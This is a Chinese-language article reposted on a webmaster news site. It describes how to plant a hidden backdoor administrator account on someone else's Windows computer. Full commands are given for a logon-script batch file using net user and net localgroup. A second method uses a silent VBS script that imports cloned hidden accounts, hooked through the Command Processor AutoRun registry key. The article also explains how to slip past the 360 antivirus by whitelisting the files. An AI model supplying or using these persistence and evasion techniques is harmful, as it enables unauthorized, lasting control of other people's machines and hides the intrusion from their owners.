操作步骤: 1、在自己电脑里面建立一个.txt文本文件. 2、在里面输入内容: @echo off net user xixi 123456 /add 注释:前面xixi是用户名后面123456是密码; net localgroup administrators xixi /add 3、把这个文件保存,更改后缀为xixi.bat 注释:前面名字随便,后面格式一定要是bat; 4、把这个文件拷贝到对方电脑C:\WINNT\system32\GroupPolicy\User\Scripts\Logon文件目录下,没有的话自己创建。别忘了将文件属性设为“隐藏”哦! 完成,下次对方电脑无论如何都有这个管理员帐号,删除了,下次启动还有! 如果把里面的内容改成: @echo off net user administrator 123456 /add 意思是不管你怎么改,下次启动管理员帐号administrator密码一直是123456 作者:xixi 逍遥复仇点评:以上应该对应的就是组策略里计算机管理中的“登录”和“注销”脚本,打开gpedit.msc找找看,听说此法360能检测出来,我是没有试,你可以先用360扫一下如果能查出来将其设为信任就OK了! 强调一下本文貌似要配合《安静运行批处理vbs脚本》才算是完美!既然都走到这里了《建立超级隐藏账号方法》这篇也一起看了吧! ================================================================== 另外一种命令行截持重建帐号的方法: 将已在注册中克隆好的帐号分别导出一份,比如"guest$.reg"和"0x3f5.reg"复制c:\windows\目录下,然后在同目录下建立一个cmd.vbs脚本内容如下: On Error Resume Next set yecha=wscript.createobject("wscript.shell") yecha.run "regedit.exe /s guest$.reg",0 yecha.run "regedit.exe /s 0x3f5.reg",0 在注册表中这个项KEY_LOCAL_MACHINE\Software\Microsoft\Command Processor\AutoRun里AutoRun键值中输入我们的脚本路径就OK。 (这个项起的作用是打开CMD自动运行我们编辑好的脚本文件) 提示:360安全卫士能查的出来显示为“命令行截持”,TNND,我把它加入信任了就没事了,管理员神精了会天天翻360那个不起眼的地方? 整理作者:逍遥复仇 |
免责声明:本站部分文章和图片均来自用户投稿和网络收集,旨在传播知识,文章和图片版权归原作者及原出处所有,仅供学习与参考,请勿用于商业用途,如果损害了您的权利,请联系我们及时修正或删除。谢谢!
始终以前瞻性的眼光聚焦站长、创业、互联网等领域,为您提供最新最全的互联网资讯,帮助站长转型升级,为互联网创业者提供更加优质的创业信息和品牌营销服务,与站长一起进步!让互联网创业者不再孤独!
扫一扫,关注站长网微信